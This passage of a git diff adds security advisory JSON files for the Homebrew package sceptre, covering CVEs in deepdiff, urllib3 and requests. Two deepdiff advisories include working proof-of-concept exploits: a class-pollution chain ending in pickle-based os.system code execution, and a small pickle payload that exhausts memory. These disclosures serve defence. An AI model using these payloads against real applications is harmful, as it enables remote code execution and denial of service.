"subject_version": "8.6.2", + "key": "pkg:pypi/deepdiff@8.6.2", + "resource": "deepdiff" + } + ] + }, + "summary": "DeepDiff Class Pollution in Delta class leading to DoS, Remote Code Execution, and more", + "details": "### Summary\n[Python class pollution](https://blog.abdulrah33m.com/prototype-pollution-in-python/) is a novel vulnerability categorized under [CWE-915](https://cwe.mitre.org/data/definitions/915.html). The `Delta` class is vulnerable to class pollution via its constructor, and when combined with a gadget available in DeltaDiff itself, it can lead to Denial of Service and Remote Code Execution (via insecure [Pickle](https://docs.python.org/3/library/pickle.html) deserialization).\n\nThe gadget available in DeepDiff allows `deepdiff.serialization.SAFE_TO_IMPORT` to be modified to allow dangerous classes such as `posix.system`, and then perform insecure Pickle deserialization via the Delta class. This potentially allows any Python code to be executed, given that the input to `Delta` is user-controlled.\n\nDepending on the application where DeepDiff is used, this can also lead to other vulnerabilities. For example, in a web application, it might be possible to bypass authentication via class pollution.\n\n### Details\n\nThe `Delta` class can take different object types as a parameter in its constructor, such as a `DeltaDiff` object, a dictionary, or even just bytes (that are deserialized via Pickle).\n\nWhen it takes a dictionary, it is usually in the following format:\n```py\nDelta({\"dictionary_item_added\": {\"root.myattr['foo']\": \"bar\"}})\n```\n\nTrying to apply class pollution here does not work, because there is already a filter in place: https://github.com/seperman/deepdiff/blob/b639fece73fe3ce4120261fdcff3cc7b826776e3/deepdiff/path.py#L23\n\nHowever, this code only runs when parsing the path from a string.\nThe `_path_to_elements` function helpfully returns the given input if it is already a list/tuple:\nhttps://github.com/seperman/deepdiff/blob/b639fece73fe3ce4120261fdcff3cc7b826776e3/deepdiff/path.py#L52-L53\n\nThis means that it is possible to pass the path as the internal representation used by Delta, bypassing the filter:\n\n```py\nDelta(\n {\n \"dictionary_item_added\": {\n (\n (\"root\", \"GETATTR\"),\n (\"__init__\", \"GETATTR\"),\n (\"__globals__\", \"GETATTR\"),\n (\"PWNED\", \"GET\"),\n ): 1337\n }\n },\n)\n```\n\nGoing back to the possible inputs of `Delta`, when it takes a `bytes` as input, it uses pickle to deserialize them.\nCare was taken by DeepDiff to prevent arbitrary code execution via the `SAFE_TO_IMPORT` allow list.\nhttps://github.com/seperman/deepdiff/blob/b639fece73fe3ce4120261fdcff3cc7b826776e3/deepdiff/serialization.py#L62-L98\nHowever, using the class pollution in the `Delta`, an attacker can add new entries to this `set`.\n\nThis then allows a second call to `Delta` to [unpickle an insecure class](https://davidhamann.de/2020/04/05/exploiting-python-pickle/) that runs `os.system`, for example.\n\n#### Using dict\n\nUsually, class pollution [does not work](https://gist.github.com/CalumHutton/45d33e9ea55bf4953b3b31c84703dfca#technical-details) when traversal starts at a `dict`/`list`/`tuple`, because it is not possible to reach `__globals__` from there.\nHowever, using two calls to `Delta` (or just one call if the target dictionary that already contains at least one entry) it is possible to first change one entry of the dictionary to be of type `deepdiff.helper.Opcode`, which then allows traversal to `__globals__`, and notably `sys.modules`, which in turn allows traversal to any module already loaded by Python.\nPassing `Opcode` around can be done via pickle, which `Delta` will happily accept given it is in the default allow list.\n\n### Proof of Concept\n\nWith deepdiff 8.6.0 installed, run the following scripts for each proof of concept.\nAll input to `Delta` is assumed to be user-controlled.\n\n#### Denial of Service\n\nThis script will pollute the value of `builtins.int`, preventing the class from being used and making code crash whenever invoked.\n\n```py\n# ------------[ Setup ]------------\nimport pickle\n\nfrom deepdiff.helper import Opcode\n\npollute_int = pickle.dumps(\n {\n \"values_changed\": {\"root['tmp']\": {\"new_value\": Opcode(\"\", 0, 0, 0, 0)}},\n \"dictionary_item_added\": {\n (\n (\"root\", \"GETATTR\"),\n (\"tmp\", \"GET\"),\n (\"__repr__\", \"GETATTR\"),\n (\"__globals__\", \"GETATTR\"),\n (\"__builtins__\", \"GET\"),\n (\"int\", \"GET\"),\n ): \"no longer a class\"\n },\n }\n)\n\n\nassert isinstance(pollute_int, bytes)\n\n# ------------[ Exploit ]------------\n# This could be some example, vulnerable, application.\n# The inputs above could be sent via HTTP, for example.\n\nfrom deepdiff import Delta\n\n# Existing dictionary; it is assumed that it contains\n# at least one entry, otherwise a different Delta needs to be\n# applied first, adding an entry to the dictionary.\nmydict = {\"tmp\": \"foobar\"}\n\n# Before pollution\nprint(int(\"41\") + 1)\n\n# Apply Delta to mydict\nresult = mydict + Delta(pollute_int)\n\nprint(int(\"1337\"))\n```\n\n```shell\n$ python poc_dos.py\n42\nTraceback (most recent call last):\n File \"/tmp/poc_dos.py\", line 43, in \n print(int(\"1337\"))\nTypeError: 'str' object is not callable\n```\n\n#### Remote Code Execution\n\nThis script will create a file at `/tmp/pwned` with the output of `id`.\n\n```py\n# ------------[ Setup ]------------\nimport os\nimport pickle\n\nfrom deepdiff.helper import Opcode\n\npollute_safe_to_import = pickle.dumps(\n {\n \"values_changed\": {\"root['tmp']\": {\"new_value\": Opcode(\"\", 0, 0, 0, 0)}},\n \"set_item_added\": {\n (\n (\"root\", \"GETATTR\"),\n (\"tmp\", \"GET\"),\n (\"__repr__\", \"GETATTR\"),\n (\"__globals__\", \"GETATTR\"),\n (\"sys\", \"GET\"),\n (\"modules\", \"GETATTR\"),\n (\"deepdiff.serialization\", \"GET\"),\n (\"SAFE_TO_IMPORT\", \"GETATTR\"),\n ): set([\"posix.system\"])\n },\n }\n)\n\n\n# From https://davidhamann.de/2020/04/05/exploiting-python-pickle/\nclass RCE:\n def __reduce__(self):\n cmd = \"id > /tmp/pwned\"\n return os.system, (cmd,)\n\n\n# Wrap object with dictionary so that Delta does not crash\nrce_pickle = pickle.dumps({\"_\": RCE()})\n\nassert isinstance(pollute_safe_to_import, bytes)\nassert isinstance(rce_pickle, bytes)\n\n# ------------[ Exploit ]------------\n# This could be some example, vulnerable, application.\n# The inputs above could be sent via HTTP, for example.\n\nfrom deepdiff import Delta\n\n# Existing dictionary; it is assumed that it contains\n# at least one entry, otherwise a different Delta needs to be\n# applied first, adding an entry to the dictionary.\nmydict = {\"tmp\": \"foobar\"}\n\n# Apply Delta to mydict\nresult = mydict + Delta(pollute_safe_to_import)\n\nDelta(rce_pickle) # no need to apply this Delta\n```\n\n```shell\n$ python poc_rce.py\n$ cat /tmp/pwned\nuid=1000(dtc) gid=100(users) groups=100(users),1(wheel)\n```\n\n### Who is affected?\n\nOnly applications that pass (untrusted) user input directly into `Delta` are affected.\n\nWhile input in the form of `bytes` is the most flexible, there are certainly other gadgets, depending on the application, that can be used via just a dictionary. This dictionary could easily be parsed, for example, from JSON. One simple example would be overriding `app.secret_key` of a Flask application, which would allow an attacker to sign arbitrary cookies, leading to an authentication bypass.\n\n### Mitigations\n\nA straightforward mitigation is preventing traversal through private keys, like it is already done in the path parser.\nThis would have to be implemented in both `deepdiff.path._get_nested_obj` and `deepdiff.path._get_nested_obj_and_force`,\nand possibly in `deepdiff.delta.Delta._get_elements_and_details`.\nExample code that raises an error when traversing these properties:\n```py\nif elem.startswith(\"__\") and elem.endswith(\"__\"):\n raise ValueError(\"traversing dunder attributes is not allowed\")\n```\n\nHowever, if it is desirable to still support attributes starting and ending with `__`, but still protect against this vulnerability, it is possible to only forbid `__globals__` and `__builtins__`, which stops the most serious cases of class pollution (but not all).\nThis was the solution adopted by pydash: https://github.com/dgilland/pydash/issues/180", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/seperman/deepdiff/security/advisories/GHSA-mw26-5g2v-hqw3" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58367" + }, + { + "type": "WEB", + "url": "https://github.com/dgilland/pydash/issues/180" + }, + { + "type": "WEB", + "url": "https://github.com/dgilland/pydash/commit/2015f0a4bcdbc3a5b27652e38fe97b3ee13ac15f" + }, + { + "type": "WEB", + "url": "https://github.com/seperman/deepdiff/commit/c69c06c13f75e849c770ade3f556cd16209fd183" + }, + { + "type": "PACKAGE", + "url": "https://github.com/seperman/deepdiff" + }, + { + "type": "WEB", + "url": "https://github.com/seperman/deepdiff/releases/tag/8.6.1" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2025-66418.json b/advisories/BREW-sceptre-CVE-2025-66418.json new file mode 100644 index 00000000000..ba5c307df74 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2025-66418.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2025-66418", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-gm62-xv2j-4w53", + "CVE-2025-66418", + "PYSEC-2026-1998" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.6.0", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "urllib3 allows an unbounded number of links in the decompression chain", + "details": "## Impact\n\nurllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`).\n\nHowever, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data.\n\n\n## Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly.\n\n\n## Remediation\n\nUpgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5.\n\nIf upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers[\"content-encoding\"]` contains a safe number of encodings before reading the response content.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66418" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2025-66471.json b/advisories/BREW-sceptre-CVE-2025-66471.json new file mode 100644 index 00000000000..f0d5899bfb5 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2025-66471.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2025-66471", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-2xpw-w6gg-jr37", + "CVE-2025-66471", + "PYSEC-2026-1994" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.6.0", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "urllib3 streaming API improperly handles highly compressed data", + "details": "### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nWhen streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation.\n\nThe decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data.\n\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources.\n\n`stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`, `readinto(b)` are examples of `urllib3.HTTPResponse` method calls using the affected logic unless decoding is disabled explicitly.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount.\n\nIf your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the `urllib3[brotli]` extra in the patched versions of urllib3.\n\n\n### Credits\n\nThe issue was reported by @Cycloctane.\nSupplemental information was provided by @stamparm during a security audit performed by [7ASecurity](https://7asecurity.com/) and facilitated by [OSTIF](https://ostif.org/).", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66471" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2026-21441.json b/advisories/BREW-sceptre-CVE-2026-21441.json new file mode 100644 index 00000000000..553b51499c3 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2026-21441.json @@ -0,0 +1,97 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2026-21441", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-38jv-5279-wg99", + "CVE-2026-21441", + "PYSEC-2026-1996" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.6.3", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "Decompression-bomb safeguards bypassed when following HTTP redirects (streaming API)", + "details": "### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nurllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption.\n\nHowever, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409).\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when `preload_content=False`.\n\nIf upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted source.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21441" + }, + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/01/msg00017.html" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2026-25645.json b/advisories/BREW-sceptre-CVE-2026-25645.json new file mode 100644 index 00000000000..c32ef263f29 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2026-25645.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2026-25645", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-gc5v-m9x4-r6x2", + "CVE-2026-25645", + "PYSEC-2026-2275" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.33.0", + "resource": "requests", + "resource_purl": "pkg:pypi/requests@2.34.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "requests", + "subject_version": "2.34.2", + "key": "pkg:pypi/requests@2.34.2", + "resource": "requests" + } + ] + }, + "summary": "Requests has Insecure Temp File Reuse in its extract_zipped_paths() utility function", + "details": "### Impact\nThe `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one.\n\n### Affected usages\n**Standard usage of the Requests library is not affected by this vulnerability.** Only applications that call `extract_zipped_paths()` directly are impacted.\n\n### Remediation\nUpgrade to at least Requests 2.33.0, where the library now extracts files to a non-deterministic location.\n\nIf developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25645" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7" + }, + { + "type": "PACKAGE", + "url": "https://github.com/psf/requests" + }, + { + "type": "WEB", + "url": "https://github.com/psf/requests/releases/tag/v2.33.0" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2026-33155.json b/advisories/BREW-sceptre-CVE-2026-33155.json new file mode 100644 index 00000000000..80d1acf6a38 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2026-33155.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2026-33155", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-54jj-px8x-5w5q", + "CVE-2026-33155", + "PYSEC-2026-2445" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "8.6.2", + "resource": "deepdiff", + "resource_purl": "pkg:pypi/deepdiff@8.6.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "deepdiff", + "subject_version": "8.6.2", + "key": "pkg:pypi/deepdiff@8.6.2", + "resource": "deepdiff" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "deepdiff", + "subject_version": "8.6.2", + "key": "pkg:pypi/deepdiff@8.6.2", + "resource": "deepdiff" + } + ] + }, + "summary": "DeepDiff has Memory Exhaustion DoS through SAFE_TO_IMPORT", + "details": "### Summary\n\nThe pickle unpickler `_RestrictedUnpickler` validates which classes can be loaded but does not limit their constructor arguments. A few of the types in `SAFE_TO_IMPORT` have constructors that allocate memory proportional to their input (`builtins.bytes`, `builtins.list`, `builtins.range`). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call `pickle_load` with untrusted data.\n\n### Details\n\nCVE-2025-58367 hardened the delta class against pollution and remote code execution by converting `SAFE_TO_IMPORT` to a `frozenset` and blocking traversal. `_RestrictedUnpickler.find_class` only gates which classes can be loaded. It doesn't intercept `REDUCE` opcodes or validate what is passed to constructors.\n\nIt can be exploited in 2 ways.\n\n**1 - During `pickle_load`**\n\nA pickle that calls `bytes(N)` using opcodes permitted by the allowlist. The allocation happens during deserialization and before the delta processes anything. The restricted unpickler does not override `load_reduce` so any allowed class can be called.\n\n```\nGLOBAL builtins.bytes (passes find_class check — serialization.py:353)\nINT 10000000000 (10 billion)\nTUPLE + REDUCE → bytes(10**10) → allocates ~9.3 GB\n```\n\n**2 - During delta application**\n\nA valid diff dict that first sets a value to a large int via `values_changed`, then converts it to bytes via `type_changes`. It works because `_do_values_changed()` runs before `_do_type_changes()` in `Delta.add()` in `delta.py` line 183. Step 1 modifies the target in place before step 2 reads the modified value and calls `new_type(current_old_value)` at `delta.py` line 576 with no size guard.\n\n### PoC\n\nThe script uses Python's `resource` module to cap memory to 1 GB so you can reproduce safely without hitting the OOM killer. It loads deepdiff first, applies the limit, then runs the payload. Change `10**8` to `10**10` for the full 9.3 GB allocation.\n\n```python\nimport resource\nimport sys\n\ndef limit_memory(maxsize_mb):\n \"\"\"Cap virtual memory for this process.\"\"\"\n soft, hard = resource.getrlimit(resource.RLIMIT_AS)\n maxsize_bytes = maxsize_mb * 1024 * 1024\n try:\n resource.setrlimit(resource.RLIMIT_AS, (maxsize_bytes, hard))\n print(f\"[*] Memory limit set to {maxsize_mb} MB\")\n except ValueError:\n print(\"[!] Failed to set memory limit.\")\n sys.exit(1)\n\n# Load heavy imports before enforcing the limit\nfrom deepdiff import Delta\nfrom deepdiff.serialization import pickle_dump, pickle_load\n\nlimit_memory(1024)\n\n# --- Delta application path ---\npayload_dict = {\n 'values_changed': {\"root['x']\": {'new_value': 10**8}},\n 'type_changes': {\"root['x']\": {'new_type': bytes}},\n}\n\npayload1 = pickle_dump(payload_dict)\nprint(f\"Payload size: {len(payload1)} bytes\")\n\ntarget = {'x': 'anything'}\ntry:\n result = target + Delta(payload1)\n print(f\"Allocated: {len(result['x']) // 1024 // 1024} MB\")\n print(f\"Amplification: {len(result['x']) // len(payload1)}x\")\nexcept MemoryError:\n print(\"[!] MemoryError — payload tried to allocate too much\")\n\n# --- Raw pickle path ---\npayload2 = (\n b\"(dp0\\n\"\n b\"S'_'\\n\"\n b\"cbuiltins\\nbytes\\n\"\n b\"(I100000000\\n\"\n b\"tR\"\n b\"s.\"\n)\n\nprint(f\"Payload size: {len(payload2)} bytes\")\ntry:\n result2 = pickle_load(payload2)\n print(f\"Allocated: {len(result2['_']) // 1024 // 1024} MB\")\nexcept MemoryError:\n print(\"[!] MemoryError — payload tried to allocate too much\")\n```\n\nOutput:\n```\n[*] Memory limit set to 1024 MB\nPayload size: 123 bytes\nAllocated: 95 MB\nAmplification: 813008x\nPayload size: 42 bytes\nAllocated: 95 MB\n```\n\n### Impact\n\nDenial of service. Any application that deserializes delta objects or calls `pickle_load` with untrusted inputs can be crashed with a small payload. The restricted unpickler is meant to make this safe. It prevents remote code execution but doesn't prevent resource exhaustion.\n\nThe amplification is large. 800,000x for delta and 2,000,000x for raw pickle.\n\nImpacted users are anyone who accepts serialized delta objects from untrusted sources — network APIs, file uploads, message queues, etc.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/qlustered/deepdiff/security/advisories/GHSA-54jj-px8x-5w5q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33155" + }, + { + "type": "WEB", + "url": "https://github.com/qlustered/deepdiff/commit/0d07ec21d12b46ef4e489383b363eadc22d990fb" + }, + { + "type": "PACKAGE", + "url": "https://github.com/seperman/deepdiff" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2026-44431.json b/advisories/BREW-sceptre-CVE-2026-44431.json new file mode 100644 index 00000000000..819d36b565c --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2026-44431.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2026-44431", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-qccp-gfcp-xxvc", + "CVE-2026-44431", + "PYSEC-2026-141" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.7.0", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "urllib3: Sensitive headers forwarded across origins in proxied low-level redirects", + "details": "### Impact\n\nWhen following cross-origin redirects for requests made using urllib3’s high-level APIs, such as `urllib3.request()`, `PoolManager.request()`, and `ProxyManager.request()`, sensitive headers — `Authorization`, `Cookie`, and `Proxy-Authorization` (defined in `Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT`) — are stripped by default, as expected.\n\nHowever, cross-origin redirects followed from the low-level API via `ProxyManager.connection_from_url().urlopen(..., assert_same_host=False)` still forward these sensitive headers.\n\n### Affected usage\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected if they allow cross-origin redirects while making requests through `HTTPConnection.urlopen()` instances created via `ProxyManager.connection_from_url()`.\n\n### Remediation\n\nUpgrade to urllib3 version 2.7.0 or later, in which sensitive headers are stripped from redirects followed by `HTTPConnection`.\n\nIf upgrading is not immediately possible, avoid using this low-level redirect flow for cross-origin redirects. If appropriate for your use case, switch to `ProxyManager.request()`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431" + }, + { + "type": "PACKAGE", 